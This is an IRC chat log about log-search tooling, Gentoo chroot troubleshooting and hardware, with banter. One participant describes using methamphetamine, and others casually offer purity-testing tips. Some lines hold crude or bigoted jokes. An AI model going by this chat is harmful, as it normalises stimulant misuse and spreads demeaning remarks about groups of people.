gabriel_laddel: what'd the lawyer say? 1742835;1511501935;mircea_popescu;a really ? finally moved to limit the tort nonsense via employment weird trick ? 1742836;1511502025;gabriel_laddel;After that call + several others failing to pick up, I gave up on the whole thing. If you lived out here, you'd not expect sanity from the court system, or any established entity tbh 1742837;1511502045;mircea_popescu;sux. 1742838;1511502113;gabriel_laddel;Finally figured out how to score meth tho. Tis the bomb diggity & works exactly as I noted here in the logs prior to finding it. 1742839;1511502387;phf;… 1742840;1511502886;asciilifeform;http://btcbase.org/log/2017-11-24#1742784 << >> http://btcbase.org/log/2017-08-01#1692210 ? 1742841;1511502886;a111;Logged on 2017-11-24 04:35 phf: asciilifeform: ty, and another question, where was the code for that com1 to display thing that you had? 1742842;1511502886;a111;Logged on 2017-08-01 18:53 asciilifeform: http://archive.is/OqECs for posterity. 1742843;1511502898;phf;ty 1742844;1511503031;phf;~~0.90s operation on average 1742845;1511503031;BingoBoingo; http://btcbase.org/log/2017-11-18#1740498 < "Are you employed? The courts are looking for lost wages in medmal cases" << You are supposed to answer "My wages are sin, I am loosing enjoyment from life from this suffering" 1742846;1511503031;a111;Logged on 2017-11-18 22:31 ben_vulpes: gabriel_laddel: what'd the lawyer say? 1742847;1511503044;BingoBoingo;!!Up gabriel_laddel 1742848;1511503044;deedbot;gabriel_laddel voiced for 30 minutes. 1742849;1511503058;gabriel_laddel;Brånemark spent almost 30 years fighting the scientific community for acceptance of osseointegration as a viable treatment. In Sweden he was often openly ridiculed at scientific conferences. 1742850;1511503068;gabriel_laddel;Every.Single.Time. 1742851;1511503252;gabriel_laddel; http://btcbase.org/log/2017-11-24#1742839 < https://eshackleton.com/2014/03/16/forced-march-tablets/ 1742852;1511503252;a111;Logged on 2017-11-24 05:46 phf: … 1742853;1511503385;BingoBoingo;gabriel_laddel: You know... forced marches are for consumables... Not for capital... 1742854;1511503417;asciilifeform;the q invites itself -- forced march to ~where~ 1742855;1511503437;gabriel_laddel;asciilifeform Lispm. 1742856;1511503472;asciilifeform;http://btcbase.org/log/2016-12-01#1575702 << see also 1742857;1511503472;a111;Logged on 2016-12-01 18:19 asciilifeform: but quite destructive to folx who are doing equivalent of ~planning~ the march 1742858;1511503478;BingoBoingo;Is it in forced march distance? y/N 1742859;1511503531;BingoBoingo;In other news: "Kenwanna Randolph, a 24-year-old woman from Chicago, was traveling northbound on Illinois Avenue approaching Mill Street when she reported not seeing the officer’s emergency lights or hearing the siren. The front of Randolph’s Ford Fiesta struck the passenger side of the police car, causing major damage to both vehicles, police said. " 1742860;1511503633;*;asciilifeform pictures prenatal biography, beginning with a 'hey ken, wanna...' 1742861;1511503648;BingoBoingo;lol 1742862;1511503693;phf;gabriel_laddel: i have a yoga mat, a strip of lsd, a supply of codeine and a medical insurance card; i don't question their usefulness, i just think it's important to be able to discriminate, so as to apply each one of them appropriately 1742863;1511504096;asciilifeform;http://btcbase.org/log/2016-11-30#1575188 << see also also , gabriel_laddel 1742864;1511504096;a111;Logged on 2016-11-30 23:38 asciilifeform: dopes that make the eater happier to do repetitive / dumb task, are death to programmer. 1742865;1511504318;phf;mircea_popescu: http://btcbase.org/log-search-day-hist.png?q=gossipd http://btcbase.org/log-search-day-hist.png?q=ada+from:ascii http://btcbase.org/log-search-day-hist.png?q=phuctor http://btcbase.org/log-search-day-hist.png?q=dog 1742866;1511504432;asciilifeform;oh neato 1742867;1511504449;phf;these'll be disabled when i go to sleep in a few though 1742868;1511504468;asciilifeform;pheature req : dragon line 1742869;1511504499;phf;i don't know what that is, please link to relevant materials 1742870;1511504517;asciilifeform;the b-a split 1742871;1511504521;phf;also perhaps suggestions for choice of function 1742872;1511504525;phf;haha, k 1742873;1511504641;gabriel_laddel;While I'm here: At no point did I forget that I'd agreed to build the archiver - however I was banned from the place I'd arranged to host it on 3(!) separate occasions. 1742874;1511504668;asciilifeform;where ? 1742875;1511504676;phf;it might actually be cheaper to roll the operation into search, and then use an inline base64 img.. 1742876;1511504687;gabriel_laddel;Nor have I forgotten $ELSE. Simply overestimated own ability / underestimated the complete idiocy of surrounding populace 1742877;1511504708;gabriel_laddel;asciilifeform: https://embassynetwork.com/locations/embassysf/ 1742878;1511504779;BingoBoingo;gabriel_laddel: Have you considered leaving SF? 1742879;1511504794;asciilifeform;'... an experiment in creating a home built around purpose, intention, and exploration. We are 13 residents and we employ experimental, fluid use of space, sharing behaviors and the creation of new ways of being. Within our space we have short term guest spaces and during the day the space is used by writers, artists, hackers and film makers.' 1742880;1511504795;gabriel_laddel;BingoBoingo The INSTANT I have an option out, I'm gone. 1742881;1511504815;*;BingoBoingo would suggest walking, but... 1742882;1511504820;gabriel_laddel;hahahaa 1742883;1511504856;asciilifeform;!!up gabriel_laddel 1742884;1511504857;deedbot;gabriel_laddel voiced for 30 minutes. 1742885;1511504864;BingoBoingo;Now gabriel_laddel you do know that your forced march medicine is going to increase you dental expenses, yes? 1742886;1511504872;asciilifeform;BingoBoingo: d00d still got 1 leg left, neh 1742887;1511504880;asciilifeform;legs aint the problem 1742888;1511504890;BingoBoingo;Head legs may be... 1742889;1511504920;gabriel_laddel;BingoBoingo I'm aware. 1742890;1511504961;asciilifeform;BingoBoingo: i gotta nitpick, there is afaik no direct connection b/w meth and tooth decay. strictly in the temptation to 'hey i didnt sleep, why brush teeth..' 1742891;1511504981;BingoBoingo;From my encouters with those how have ended their forced marches while still vertical, mid 4 figure bezzel bucks is standard... or dentures 1742892;1511505005;BingoBoingo;asciilifeform: The connection is xerostymia, no salivary cleaning action goes on while meth'd 1742893;1511505021;asciilifeform;much of the physical pathology of meth and coke aficionados is from effect of eschewing sleep, rather than the actual substance 1742894;1511505043;gabriel_laddel;asciilifeform There is jaw clenching if you accidentally take too much 1742895;1511505053;BingoBoingo;From what I understand the aggravating factor is vasoconstriction to the mucosa 1742896;1511505075;*;asciilifeform can picture 1742897;1511505080;BingoBoingo; asciilifeform There is jaw clenching if you accidentally take too much << What accidentally and too much? 1742898;1511505232;gabriel_laddel;Eg the other day it "didn't kick in", so I had another few mouthfuls of methwater, only to remember "oh fk, I have to have coffee or it won't work" 1742899;1511505244;gabriel_laddel;then -- BLAM. Tweaking. 1742900;1511505260;gabriel_laddel;(after coffee, ofc) 1742901;1511505291;BingoBoingo;WHy not orange juice? 1742902;1511505305;BingoBoingo;Or vaporize? 1742903;1511505444;asciilifeform;gabriel_laddel: what do you go to do, when 'kicks in' ? i thought your linux item, were done ? 1742904;1511505474;asciilifeform;and sold preinstalled on old lenovo lappys or what it was 1742905;1511505494;phf;revolution never sleeps 1742906;1511505532;BingoBoingo;Sure it does, sleep is when NYPD beat "Occupy" 1742907;1511505548;gabriel_laddel;asciilifeform: There is still plenty to do. CLIM's COM-FOO machinery has to be cut & replaced with "functions most often called on / FTYPE matches this as a valid ARG" 1742908;1511505591;asciilifeform;by hand?! 1742909;1511505603;gabriel_laddel;Oh god no 1742910;1511505619;mircea_popescu;phf o hey pretty cool. 1742911;1511505641;mircea_popescu;i was thinking they'd be horiz right under "x entries in y seconds" 1742912;1511505681;mircea_popescu;though 1s of churning seems excessive. 1742913;1511505686;phf;particular graph is x entries per day 1742914;1511505710;phf;from beginning of log to present day 1742915;1511505716;phf;horiz can be done 1742916;1511505763;mircea_popescu;yeah but you happy with that much cpu melt ? i mean, if you get a buncha concurrent searches... 1742917;1511505817;mircea_popescu;http://btcbase.org/log/2017-11-24#1742862 << amusingly, i have none of those. 1742918;1511505817;a111;Logged on 2017-11-24 06:08 phf: gabriel_laddel: i have a yoga mat, a strip of lsd, a supply of codeine and a medical insurance card; i don't question their usefulness, i just think it's important to be able to discriminate, so as to apply each one of them appropriately 1742919;1511505883;phf;well, i'm try-en to make a point here, i only really have a yoga mat.. 1742920;1511505945;mircea_popescu;i suppose i have a coupla girls that have yoga mats... 1742921;1511505946;gabriel_laddel;phf: the point being? Fwiw, I'm trying to forced march myself into some stable employment while crippled. 1742922;1511506317;BingoBoingo;gabriel_laddel: How's your spanish? 1742923;1511506374;mircea_popescu;http://btcbase.org/log/2017-11-24#1742890 << there is, there is. metamphetamine overdrives half the metabolic mechanism, not just the parts you notice. 1742924;1511506374;a111;Logged on 2017-11-24 06:29 asciilifeform: BingoBoingo: i gotta nitpick, there is afaik no direct connection b/w meth and tooth decay. strictly in the temptation to 'hey i didnt sleep, why brush teeth..' 1742925;1511506385;*;BingoBoingo can keep an eye out for openings for gabriel_laddel in Montevideo 1742926;1511506388;mircea_popescu;makes saliva way overpeptic, as a result mouth is no longer a balanced system 1742927;1511506401;gabriel_laddel;BingoBoingo: Nil. 1742928;1511506420;BingoBoingo;Mebbe pirate some pimsleur? 1742929;1511506432;BingoBoingo;get a hardware store gig? 1742930;1511506489;mircea_popescu;there's also the problems of grinding, and on it goes. 1742931;1511506545;phf;asciilifeform: added a dragon line, some other indicators might be worthwhile, like year markers.. 1742932;1511506564;mircea_popescu;and better colors. like blue/white or somesuych 1742933;1511506582;phf;well, yes :) 1742934;1511506644;phf;i still want to try a couple of different image spitting libraries. this one is particularly expensive, nor does it support palette, so adding colors increased its size by two 1742935;1511506686;mircea_popescu;by now we're far out on the edges of lisp-for-html-imagemagicks. 1742936;1511506823;mircea_popescu;so don't kill yourself over it ; if it knows no easy solution may be solved in x years, there's pressinger things. 1742937;1511507435;phf;aye 1742938;1511507487;phf;am not going to start writing image encoders from scratch 1742939;1511528698;mircea_popescu;aaand for the record, the correct way to set the entry message is : "/msg chanserv set #trilema entrymsg To speak in #trilema you must be voiced" etc. 1742940;1511532840;deedbot;http://trilema.com/2017/trilema-maintenance/ << Trilema - #trilema maintenance 1742941;1511532862;mircea_popescu;and speaking of ^, does http://trilema.com/2016/how-to-participate-in-the-affairs-of-the-most-serene-republic/ need revising ? 1742942;1511532977;mircea_popescu;(also in campus rape culture, https://uploads.tapatalk-cdn.com/20170905/843791a1948e114f6177aafb481d745e.gif ) 1742943;1511535838;diana_coman;http://btcbase.org/log/2017-11-24#1742941 <- to my mind everything that is in there still stands as it is (assuming Qntra will be back soon); perhaps only on the study side but I'm not really sure it makes sense to give very precise items there anyway - who wants to study won't have problems finding what matters for TMSR at any given point anyway and who is not interested won't benefit from more specific items listed there 1742944;1511535838;a111;Logged on 2017-11-24 14:14 mircea_popescu: and speaking of ^, does http://trilema.com/2016/how-to-participate-in-the-affairs-of-the-most-serene-republic/ need revising ? 1742945;1511538803;mircea_popescu;myeah. 1742946;1511545947;ben_vulpes;http://www.wired.co.uk/article/painting-stolen-new-zealand-sale-gottfried-lindauer-chief-ngatai-raure 1742947;1511548483;phf;!#s test 1742948;1511548484;a111;3129 results for "test", http://btcbase.org/log-search?q=test 1742949;1511550657;phf;btcbase is going down for maintenance 1742950;1511551877;phf;… 1742951;1511555830;phf;ok, here's a more integrated PoC http://btcbase.org/log-search?q=from%3Amircea+god the image is being generated full scale, but then force by the browser to be 1000px wide. (fwiw, while still cheap, it is more expensive to resize it, than to spit out the whole thing) 1742952;1511555914;phf;mircea_popescu: ^ 1742953;1511556010;phf;i dropped it to ~~.6s and i'm not messing with it any further. about .3s of that is the search, so image generation and building of histogram is another .3s 1742954;1511558519;mircea_popescu;phf http://btcbase.org/log-search?q=mircea_popescu << lol 1742955;1511558525;mircea_popescu;pretty great new toy imo 1742956;1511558695;phf;so the bucket is made by running truncate against a certain divisor on the message timestamp in seconds. so playing with divisor gives me more/less coarse buckets 1742957;1511558721;phf;right now the bucket is basically 2 days (i.e. 2*24*60*60) 1742958;1511558747;phf;kind of affects the nature of data, but still preserves the general shape 1742959;1511558826;phf;i think the only worthwhile optimization left to do is roll the image generation into search.. because right now i'm doing double work, once for the search and once for the image. 1742960;1511558872;phf;(there can still be a linked separate endpoint that generates a standalone image, possibly at a lower coarseness, etc.) 1742961;1511559011;phf;the search, btw, cheats. it walks enough history to produce enough entries for current page+5 more pages, so searching for something like mircea_popescu is super fast, because you get 500 entries in less messages 1742962;1511559123;phf;that's the meaning of 500+, but it gets gradually expanded as you follow the pages, so the speed starts dropping. so the last page of mircea_popescu search (http://btcbase.org/log-search?q=mircea_popescu&page=512) takes 0.3s, which is maxint it takes to walk the whole history 1742963;1511559182;phf;the image generator though has to walk the whole history at once, requiring the same 0.3s at once 1742964;1511560500;BingoBoingo;http://btcbase.org/log/2017-11-24#1742943 << Qntra will be online when ISP is. Arrive in Montevideo Dec 6th, interview lawyers for corp, apply for IP address block, and meet people while waiting for LACNIC... ??? ISP 1742965;1511560500;a111;Logged on 2017-11-24 15:03 diana_coman: http://btcbase.org/log/2017-11-24#1742941 <- to my mind everything that is in there still stands as it is (assuming Qntra will be back soon); perhaps only on the study side but I'm not really sure it makes sense to give very precise items there anyway - who wants to study won't have problems finding what matters for TMSR at any given point anyway and who is not interested won't benefit from more specific items listed there 1742966;1511560655;mod6;I've updated the trb-howto guide to include 'curl' in the list of required binaries / packages ; Thanks to whaack for pointing out the glaring omission there. 1742967;1511560851;BingoBoingo;More on the countdown to Pol Pot https://identitydixie.com/2017/11/24/crush-the-urbanite-agrarian-identity/ 1742968;1511560977;BingoBoingo;"The urbanite will claim to be the true representative voice of America, but they are but a degenerated version of it. While we, the ruralites, are the true holders of our myriad cultures!" ... "Once we have achieved this strong base and brotherhood of agrarian identity, we can begin to push aspects of Agrarian Nationalism economically, socially, and politically." 1742969;1511561217;mircea_popescu;ahahaha wut. 1742970;1511561226;mircea_popescu;agrarian us ? whjat is this, a monsanto joek ? 1742971;1511563801;BingoBoingo;Nah, it's the other dreamers 1742972;1511563824;BingoBoingo;You know make America great again, as in Antebellum... 1742973;1511565732;mircea_popescu;ridoinculous 1742974;1511567991;ben_vulpes;!!up gabriel_laddel 1742975;1511567992;deedbot;gabriel_laddel voiced for 30 minutes. 1742976;1511568095;ben_vulpes;here's a lolbow, emerge-webrsync barfs with a segfault on a nomultilib stage3 with "Fatal Python error: Failed to open /dev/urandom \n Segmentation fault" 1742977;1511568522;ben_vulpes;looks to be some python strange, using an older stage3 gives similar errors until i set the python profile to 2.7 1742978;1511568614;mircea_popescu;do you have unapproved random in the box, citizen ? 1742979;1511569045;ben_vulpes;what do i look like, some sort of terrorist 1742980;1511569055;mircea_popescu;actually... 1742981;1511569066;ben_vulpes;you don't say! 1742982;1511569122;ben_vulpes;with the old stage3, emerge-webrsync downloads what it wants (i think), but then barfs at the end with "Failed to validate a sane /dev 1742983;1511569132;ben_vulpes;'/dev/null/' is not a device file 1742984;1511569135;ben_vulpes;o.O 1742985;1511569144;mircea_popescu;how the fuck not ?! 1742986;1511569151;mircea_popescu;that is EXACTLY what it is. 1742987;1511569261;ben_vulpes;i'm doing this inside a chroot, so i think maybe something isn't mounted correctly? i've tried it both the way that mod6 suggested to me (-o bind /dev $chroot/dev) and the way the gentoo installation handbook says (mount --rbind /dev dev/) 1742988;1511569421;ben_vulpes;!!up gabriel_laddel are you going to say something or just keep opening and closing the browser tab 1742989;1511569422;deedbot;gabriel_laddel voiced for 30 minutes. 1742990;1511569438;gabriel_laddel;Battery died 1742991;1511569446;gabriel_laddel; Consider https://www.amazon.com/CISNO-Digital-Microscope-Endoscope-Magnifier/dp/B075H634MP/ref=sr_1_5 1742992;1511569447;gabriel_laddel;1000x magnification seems unrealistic - that being said: if I crush some product, take hundreds of images of each sample & use them as input into a neural network along with a 1-10 (bunk-absolute fire) rating y'think it'll get trained to recognize the real deal? 1742993;1511569447;gabriel_laddel;Anyone made use of these digital usb microscopes in any context & have thoughts? 1742994;1511569451;ben_vulpes;aah batteries 1742995;1511569497;ben_vulpes;gabriel_laddel: can you even identify real meth optically? 1742996;1511569545;gabriel_laddel;Humans cannot. N-ISO can co-crystalize along with it. But a NN? Idk 1742997;1511569569;mircea_popescu;nope. 1742998;1511569584;ben_vulpes;why not just get an assay kit? 1742999;1511569665;gabriel_laddel;I'm curious about the utility of microscopes. Don't really care about meth purity too much. 1743000;1511569692;mircea_popescu;currently people are effectually using nn for speeding up sample counts where mistakes are cheap 1743001;1511569696;mircea_popescu;ie robotized lab assays 1743002;1511569720;mircea_popescu;but we're talking cells here, or protein-stains. 1743003;1511570005;trinque;this is gonna be a rock bottom story for the ages. 1743004;1511570099;mircea_popescu;trinque you're just being negative, people solve really difficult problems when they also strap a ticking timebomb to their ass all the time 1743005;1511570101;mircea_popescu;in the movies. 1743006;1511570137;gabriel_laddel;Wait a minute. Pasteur separated racemates by hand -- so I should at least be able to tell "biker crank" (racemic meth) from "crystal" (d-meth) 1743007;1511570162;mircea_popescu;alternatively, marie c glowed in the dark. 1743008;1511570186;mircea_popescu;so you should be able to either filter meth by a succession of rapid wrist swipes or else shoot lasers out of your eyes. 1743009;1511570607;gabriel_laddel;#! the people in real life are the people from movies not the people from real life 1743010;1511570655;gabriel_laddel; http://btcbase.org/log/2015-08-28#1253912 1743011;1511570655;a111;Logged on 2015-08-28 01:24 mircea_popescu: the people in life are people from movies, 1743012;1511570675;mircea_popescu;o.O 1743013;1511570692;mircea_popescu;i take it back, apparently teh meth works. 1743014;1511573815;mircea_popescu;!!up fromloper 1743015;1511573815;deedbot;fromloper voiced for 30 minutes. 1743016;1511573825;fromloper;hi everyone. I've heard that some people here are interested in Elbrus hardware, so I brought you this announcement: https://pp.userapi.com/c840421/v840421325/27721/jhAYzDMy5ms.jpg 1743017;1511573856;mircea_popescu;fromloper what's your relation to the item ? "something i found on the internet" ? or ? 1743018;1511573878;mircea_popescu;!#s "ineum.ru" 1743019;1511573879;a111;0 results for "\"ineum.ru\"", http://btcbase.org/log-search?q=%22ineum.ru%22 1743020;1511573899;fromloper;basically that, I'm following Elbrus' PR 1743021;1511573904;mircea_popescu;i c 1743022;1511573906;asciilifeform;http://btcbase.org/log/2017-11-25#1742991 << i had and threw that specific one, it is rubbish 1743023;1511573906;a111;Logged on 2017-11-25 00:24 gabriel_laddel: Consider https://www.amazon.com/CISNO-Digital-Microscope-Endoscope-Magnifier/dp/B075H634MP/ref=sr_1_5 1743024;1511573911;mircea_popescu;BingoBoingo shoot 'em an email see if they can deliver ? 1743025;1511573925;mircea_popescu;asciilifeform you mean it doesn't do 1kx ?!?! 1743026;1511573942;mircea_popescu;i though usb nullifies lens aberration through the power of unicode. 1743027;1511573952;asciilifeform;it shows mostly led glare lol 1743028;1511573957;mircea_popescu;lol 1743029;1511573960;asciilifeform;forget lens even. 1743030;1511573970;mircea_popescu;i am shocked. 1743031;1511573990;mircea_popescu;next you're gonna tell me ai isn't quite here yet and quantum computers not right around the corner, not to mention no 3d printed guns. 1743032;1511574038;asciilifeform;even 500buxor microscope,was sad 1743033;1511574063;mircea_popescu;only good high magn optic microscopes i ever saw were mirrored not lens. 1743034;1511574092;asciilifeform;http://btcbase.org/log/2017-11-25#1743016 << ftr that's 13.2k usd at current exchange rate. for a box that 1) is about same as 1k usd opteron 2) other than cpu, is made of exactly same stuff 1743035;1511574092;a111;Logged on 2017-11-25 01:37 fromloper: hi everyone. I've heard that some people here are interested in Elbrus hardware, so I brought you this announcement: https://pp.userapi.com/c840421/v840421325/27721/jhAYzDMy5ms.jpg 1743036;1511574111;mircea_popescu;digital particuarly good fit too, because usual problem with mirrors is "your head won't fit in F". but a ccd will. 1743037;1511574129;mircea_popescu;asciilifeform let's talk prices after. 1743038;1511574146;asciilifeform;after what ? 1743039;1511574174;mircea_popescu;after the guys even fucking answer. 1743040;1511574195;asciilifeform;also good 1743041;1511574209;asciilifeform;http://btcbase.org/log/2017-11-25#1742996 << gabriel_laddel ever heard of melting point ? 1743042;1511574209;a111;Logged on 2017-11-25 00:25 gabriel_laddel: Humans cannot. N-ISO can co-crystalize along with it. But a NN? Idk 1743043;1511574246;asciilifeform;i dun consider it sin to run away from grade school. but consider opening a book 1743044;1511574261;mircea_popescu;can you program a neural network to open books ? 1743045;1511574278;asciilifeform;only after lsd 1743046;1511574341;asciilifeform;!!up gabriel_laddel 1743047;1511574342;deedbot;gabriel_laddel voiced for 30 minutes. 1743048;1511574382;gabriel_laddel;Melting poing can't tell ISO from meth. MSM & other cuts can be acetone washed out. 1743049;1511574404;asciilifeform;gabriel_laddel: most of yer impurity is not the laevo- isomer but intermediate cruft 1743050;1511574481;asciilifeform;and i assume you already recrystallized ? 1743051;1511574496;gabriel_laddel;acetone wash doesn't lose any weight 1743052;1511574531;gabriel_laddel;anyways, I'm not worried about my own supply, just curious about microscopes is all 1743053;1511574553;asciilifeform;get a refractometer instead 1743054;1511574580;asciilifeform;unlike microscope it actually will do part of what you want. and costs almost nuffin. 1743055;1511574609;gabriel_laddel;Spiffy! Thanks. 1743056;1511574610;asciilifeform;and get from a big university's surplus warehouse. not from china. 1743057;1511574628;asciilifeform;!~google abbe refractometer 1743058;1511574629;jhvh1;asciilifeform: Abbe refractometer - Wikipedia: ; Abbé refractometer: ; ATAGO U.S.A.,Inc. - Products / Abbe Refractometers - refractometers ...: 1743059;1511574663;asciilifeform;^ subj. 1743060;1511574950;asciilifeform;http://btcbase.org/log/2017-11-25#1742977 << having python > 2.7 is quite like having gcc5 around. 1743061;1511574950;a111;Logged on 2017-11-25 00:08 ben_vulpes: looks to be some python strange, using an older stage3 gives similar errors until i set the python profile to 2.7 1743062;1511574962;asciilifeform;it is nearly impossible to remove the tentacles 1743063;1511574989;asciilifeform;and it makes sane gentoo a difficult proposition . 1743064;1511575014;asciilifeform;don't keep python3 around, period. 1743065;1511575056;asciilifeform;http://btcbase.org/log/2017-11-25#1742982 << this may be related to the insiduous poetterinization of udev 1743066;1511575056;a111;Logged on 2017-11-25 00:18 ben_vulpes: with the old stage3, emerge-webrsync downloads what it wants (i think), but then barfs at the end with "Failed to validate a sane /dev 1743067;1511575124;asciilifeform;!#s udev 1743068;1511575124;a111;24 results for "udev", http://btcbase.org/log-search?q=udev 1743069;1511575178;asciilifeform;http://btcbase.org/log/2016-08-04#1514410 << here and elsewhere. 1743070;1511575178;a111;Logged on 2016-08-04 13:17 asciilifeform: http://btcbase.org/log/2016-08-04#1514253 << it was eaten by systemd. there is a (last i saw, working) clean fork, 'eudev'. and it looks like phf explains further down in the l0gz. 1743071;1511575198;asciilifeform;for some reason i thought i mentioned it in my gentoo recipe. 1743072;1511576263;mircea_popescu;a, did the original poettering disappear btw ? 1743073;1511576377;mircea_popescu;doing utterly 3rd tier "gnome asia summit", for the same money he could be entertaining in atlantic city. 1743074;1511576384;asciilifeform;nfi 1743075;1511576421;asciilifeform;but his 'work' is well-glued, with broken glass, more or less everywhere in post-2011 or so linuxdom 1743076;1511576449;asciilifeform;!#s emacs dbus 1743077;1511576449;a111;27 results for "emacs dbus", http://btcbase.org/log-search?q=emacs%20dbus 1743078;1511576455;asciilifeform;^ for instance. 1743079;1511576477;mircea_popescu;https://thenewstack.io/unix-greatest-inspiration-behind-systemd/ "Lennart Poettering is one of those few extremely prolific and brilliant engineers who have literally changed the design of Linux-based operating systems." 1743080;1511576483;mircea_popescu;even the push pieces are 3rd hand 1743081;1511576498;mircea_popescu;that scene with shannon doherty "are you guys even trying anymore ?!?!" comes to mind. 1743082;1511576565;mircea_popescu;https://www.reddit.com/r/LinuxCirclejerk/comments/7errt4/im_lennart_poettering_ama/ << not even reddit can be bothered to care. 1743083;1511576585;mircea_popescu;(this, btw, is what reddit is like ON ITS OWN POWER, ie when conde nast isn't tripping up the fake account levers) 1743084;1511576965;mircea_popescu;(re link, the worthy quote, for they too lazy to dig, being "Poettering, as usual, is working on his own solutions and not complaining about the problem. He is working on bringing service management to the next level. He wants to make it easy so users can sandbox system service without necessarily isolating them completely from the host-ware. No need to pretend that a system service is a set of processes completely independen 1743085;1511576966;mircea_popescu;t from the host, which is what containers do. System services can still be part of the host and can still maybe see it but not necessarily access things." this'd then be the empire's gothic line. as the man observes himself, ""the concepts and logic behind it aren't really convincing".) 1743086;1511577088;asciilifeform;u/faded_filth << lol 1743087;1511577218;mircea_popescu;quite. 1743088;1511577467;mircea_popescu;and in other much belated lulz, http://hotchickswithdouchebags.com/blog/2016/12/the-shunning-of-the-trump-voter/ aka the winner of the trump butthurt competition 1743089;1511577619;asciilifeform;'And that party will be awesome. It will contain real people. It will have cheese dip. And premium gouda. And tasty Hostess treats. Yes, even Chocodiles. And people with actual souls. People with consciousness. From Socrates to Billy Ocean. The collective progress of Humankind. Of which you are no longer a member. Sorry, toad pimple. You forever vanquished your right to lay claim to the progression narrative of the human race.' 1743090;1511577621;asciilifeform;delish. 1743091;1511577625;mircea_popescu;you know ? 1743092;1511577630;mircea_popescu;cheeze dip 1743093;1511577711;mircea_popescu;if i mention how i had slave-labour-made fresh crannberies sauce as well as yogurt chimichurri for the lamb over thxgiving (which we don't even actually celebrate) i'm just being an asshole rite. 1743094;1511577751;mircea_popescu;(yes, many people thought they voted for trump -- but some votes for trump actually mattered. this ain't teh ourdemocracy anymoar, bish!) 1743095;1511577819;mircea_popescu;i suppose in fairness the socrates claim to progressive narrative is the best part though. poor socrates. LAST fucking thing. 1743096;1511583219;mircea_popescu;ttps://kiwifarms.net/threads/psa-thanksgiving-is-not-for-black-people.36789/ << in other unexpected obviousness. 1743097;1511585486;ben_vulpes;http://btcbase.org/log/2017-11-25#1743060 << i entirely agree, still working on making with which to crap down new root fsen without 2.7 and 5.* 1743098;1511585486;a111;Logged on 2017-11-25 01:55 asciilifeform: http://btcbase.org/log/2017-11-25#1742977 << having python > 2.7 is quite like having gcc5 around. 1743099;1511585493;ben_vulpes;without py > 2.7 i mean 1743100;1511586534;BingoBoingo; BingoBoingo shoot 'em an email see if they can deliver ? << The microscope folx or the Khemerica Rouge? 1743101;1511586568;BingoBoingo; Wait a minute. Pasteur separated racemates by hand -- so I should at least be able to tell "biker crank" (racemic meth) from "crystal" (d-meth) << Perhaps I can introduce you to little miss trainwreck so you can see how this ends 1743102;1511586787;BingoBoingo;Ah, Elbrus, let me find an email 1743103;1511586850;ben_vulpes;i can't read racemates without reading "race mates" 1743104;1511587221;BingoBoingo;lol 1743105;1511590188;BingoBoingo;Email to Elbrus folk sent 1743106;1511592850;mircea_popescu;BingoBoingo the russki 1990s era computor 1743107;1511592858;mircea_popescu;cool. 1743108;1511593794;BingoBoingo;The missive http://wotpaste.cascadianhacker.com/pastes/Z0FaQ/?raw=true 1743109;1511593907;lobbes;latest update from archiver front: I have managed to successfully bypass archive.is cloudflare js-challenge-bs. Ended up using a combination of phantomjs/casperjs scriptolade. Crude, but it worx. 1743110;1511593909;lobbes;Next steps: 1) some turd polishing 2) move the irc-to-archive.is-to-zip process into 'live' environment 3) plan/build the payment-to-archives system 1743111;1511594586;mircea_popescu;cool deal. 1743112;1511594672;*;ben_vulpes just started recompiling everything in pursuit of an ada-capable workstation 1743113;1511595585;BingoBoingo;!~ticker --market all 1743114;1511595592;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 8200.0, vol: 9340.39423201 | Bitfinex BTCUSD last: 8295.1, vol: 34331.04479026 | Kraken BTCUSD last: 8208.8, vol: 2051.4324717 | Volume-weighted last average: 8271.80071719 1743115;1511598117;BingoBoingo;!~bcstats 1743116;1511598118;jhvh1;BingoBoingo: Current Blocks: 496007 | Current Difficulty: 1.347001430558E12 | Next Difficulty At Block: 497951 | Next Difficulty In: 1944 blocks | Next Difficulty In About: 1 week, 5 days, 11 hours, 35 minutes, and 26 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None 1743117;1511627261;deedbot;http://trilema.com/2017/what-are-you-being-distracted-from/ << Trilema - What are you being distracted from ? 1743118;1511648954;ben_vulpes;i have what appears to be a chroot with gcc 4.9 and py 2.7, it can happily boot x11 proggies from within the chroot which i take as a good sign but not a definitive greenlight; and now i'm mulling how best to make this chroot the root fs for the whole box. might mount my old root into the chroot, chroot in and mv that to a backup dir (but haven't reasoned through what happens when you mount a fs containing 1743119;1511648955;ben_vulpes;the chroot into the chroot itself...), and then boot from a livecd to move the new root fs to the disk root 1743120;1511649215;asciilifeform;ben_vulpes: if the mount contains itself, you can't cp -r, nao can you. 1743121;1511649236;asciilifeform;ben_vulpes: you gotta make a temp copy. 1743122;1511649961;ben_vulpes;something like copy newroot to /, mount everything in / except the newroot copy into it, chroot into the copy, cp -r all of what was at the root of the old fs (except the new root copy) into a backup dir and then replace the contents of the root fs with the contents of the newroot copy? 1743123;1511650008;ben_vulpes;in unrelated self-crits, orange county register runs a piece titled "the future of americas suburbs looks infinite!", with such gems as "...experts claiming that many suburban tracks (sic) were about to become 'the next slums'" 1743124;1511650178;ben_vulpes;!~ticker --market all 1743125;1511650184;jhvh1;ben_vulpes: Bitstamp BTCUSD last: 8684.99, vol: 11477.68611349 | Bitfinex BTCUSD last: 8715.0, vol: 43426.35976479 | Kraken BTCUSD last: 8694.6, vol: 2724.82138459 | Volume-weighted last average: 8708.05848379 1743126;1511666377;mircea_popescu;and in other "we are the asswipes, we programatically cut the very branch we sit on" lulz, "we did not choose the "new rothchilds" nor do we want them. if bitcoin cash is a means to stop these people then it appears that the votes are being cast as we speak. if bitcoin cash is just another version of the "new rothchilds" then the votes will be cast for the next usurper. there will always be an underdog". 1743127;1511666411;mircea_popescu;because totally, the peon has this option, to insistently attempt to sabotage the elite, and it'll work to anything other than his getting utterly fucked, by apes eventually. 1743128;1511675918;ben_vulpes;brilliant ideas from the let's-build-careers-and-fingertraps-for-the-unwary-by-running-javascript-on-the-server crowd: http://tldr.sh/ 1743129;1511676924;deedbot;http://www.contravex.com/2017/11/26/specs-and-designs-for-the-first-ever-bugatti-comps/ << Contravex: A blog by Pete Dushenski - Specs and designs for the first ever Bugatti-Comps. 1743130;1511677024;trinque;aaand automatic wallet creation when n00bs register with deedbot 1743131;1511677281;ben_vulpes;aaand patient died on the operating table. 1743132;1511677326;ben_vulpes;no idea why resizing sda3 would kill my poor gentoo, but lo, i killed her jim. 1743133;1511677383;*;trinque plays taps 